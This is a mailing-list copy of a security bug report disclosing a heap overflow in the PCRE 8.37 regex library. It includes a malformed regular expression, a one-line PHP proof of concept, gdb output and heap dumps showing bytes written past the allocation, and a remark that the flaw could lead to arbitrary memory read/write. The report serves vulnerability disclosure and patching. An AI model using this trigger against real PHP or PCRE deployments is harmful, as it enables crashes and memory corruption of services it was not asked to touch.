[pcre-dev] [Bug 1667] New: PCRE Library Heap Overflow Vulner…

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Aihe: [pcre-dev] [Bug 1667] New: PCRE Library Heap Overflow Vulnerability
https://bugs.exim.org/show_bug.cgi?id=1667

            Bug ID: 1667
           Summary: PCRE Library Heap Overflow Vulnerability
           Product: PCRE
           Version: 8.37
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities in the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.
PCRE library is prone to a vulnerability which leads to Heap Overflow. During
the compilation of a malformed regular expression, more data is written on the
malloced block than the expected size output by compile_regex. Exploits with
advanced Heap Fengshui techniques may allow an attacker to execute arbitrary
code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Heap Overflow vulnerability which could
caused by the following regular expression.

/(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))/

To reproduce the problem, we could use pcretest provide by PCRE library or
applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.11 (wrapped with PCRE 8.37) could be
triggered by following code snippet:

<?php
preg_match("/(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))/","ADLAB",$arr);
?>

First, pcre_compile2 invoke compile_regex() to calcuate the size of memory that
is used to save the regular expression.
re then points to the new allocated memory with the size above.
Next, pcre_compile2 invoke compile_regex() again to fill the regular expression
into the allocated memory.
The problem here is that more data is written then expected.

Following test is conveyed under Ubuntu 14.10 x64 with php 5.6.11:
==============================================================
gdb php poc.php
9292    re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) print size
$2=184
(gdb) n
9293    if (re == NULL)
(gdb) x/x $rax
0x1f87050:      0x78
(gdb) c
9368    *code = OP_BRA;
9369    (void)compile_regex(re->options, &code, &ptr, &errorcode, FALSE, FALSE,
0, 0,
9370      &firstchar, &firstcharflags, &reqchar, &reqcharflags, NULL, cd,
NULL);
==============================================================


So the expected size of the above regular expression is 184.
And the base address of allocated memory is 0x1f87050.
Here is the layout of 0x1f87050 just before the second compile_regexp:

==============================================================
(gdb) x/192b 0x1f87050
0x1f87050:     [0x45    0x52    0x43    0x50    0xb8    0x00    0x00    0x00
0x1f87058:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1f87060:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f87068:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87070:      0xff    0xff    0x40    0x00    0x04    0x00    0x03    0x00
0x1f87078:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87080:      0x30    0x77    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f87088:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87090:      0x00    0x02    0x52    0x00    0x00    0x03    0x52    0x00
0x1f87098:      0x00    0x01    0x52    0x00    0x00    0x00    0x00    0x00
0x1f870a0:      0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0x1f870a8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870b0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870b8:      0xa0    0x76    0x34    0xf7    0xff    0x7f    0x00    0x00
0x1f870c0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870c8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870d0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870d8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870e0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870e8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870f0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f870f8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87100:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00]
0x1f87108:      0x11    0x01    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


After the second compile_regexp:

==============================================================
(gdb) x/192b 0x1f87050
0x1f87050:     [0x45    0x52    0x43    0x50    0xb8    0x00    0x00    0x00
0x1f87058:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1f87060:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f87068:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87070:      0xff    0xff    0x40    0x00    0x04    0x00    0x03    0x00
0x1f87078:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87080:      0x30    0x77    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f87088:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f87090:      0x00    0x02    0x52    0x00    0x00    0x03    0x52    0x00
0x1f87098:      0x00    0x01    0x52    0x00    0x83    0x00    0x6e    0x83
0x1f870a0:      0x00    0x68    0x83    0x00    0x55    0x81    0x00    0x4f
0x1f870a8:      0x85    0x00    0x49    0x00    0x01    0x1d    0x3a    0x83
0x1f870b0:      0x00    0x1e    0x85    0x00    0x05    0x00    0x02    0x78
0x1f870b8:      0x00    0x05    0x81    0x00    0x10    0x85    0x00    0x0a
0x1f870c0:      0x00    0x03    0x73    0x00    0x00    0x00    0x03    0x78
0x1f870c8:      0x00    0x0a    0x78    0x00    0x10    0x77    0x00    0x13
0x1f870d0:      0x85    0x00    0x0d    0x00    0x02    0x85    0x00    0x05
0x1f870d8:      0x00    0x03    0x78    0x00    0x05    0x78    0x00    0x0d
0x1f870e0:      0x78    0x00    0x31    0x1d    0x48    0x1d    0x27    0x1d
0x1f870e8:      0x52    0x1d    0x6b    0x1d    0x27    0x1d    0x52    0x1d
0x1f870f0:      0x66    0x78    0x00    0x49    0x78    0x00    0x4f    0x77
0x1f870f8:      0x00    0x0d    0x1d    0x73    0x85    0x00    0x05    0x00
0x1f87100:      0x01    0x78    0x00    0x05    0x78    0x00    0x62    0x78]
0x1f87108:     *0x00   *0x68   *0x78   *0x00   *0x6e    0x00    0x00    0x00


==============================================================

Obviously, at least 5 more bytes are written on the heap in this case.
This overflow can be used to modify adjacent length field of
array/vector/string, gaining the attacker the ability to read/write the whole
memory
in the context of the affected application (The same trick as CVE-2013-0634).

------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
latest version of PCRE is confirmed to be vulnerable).
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.

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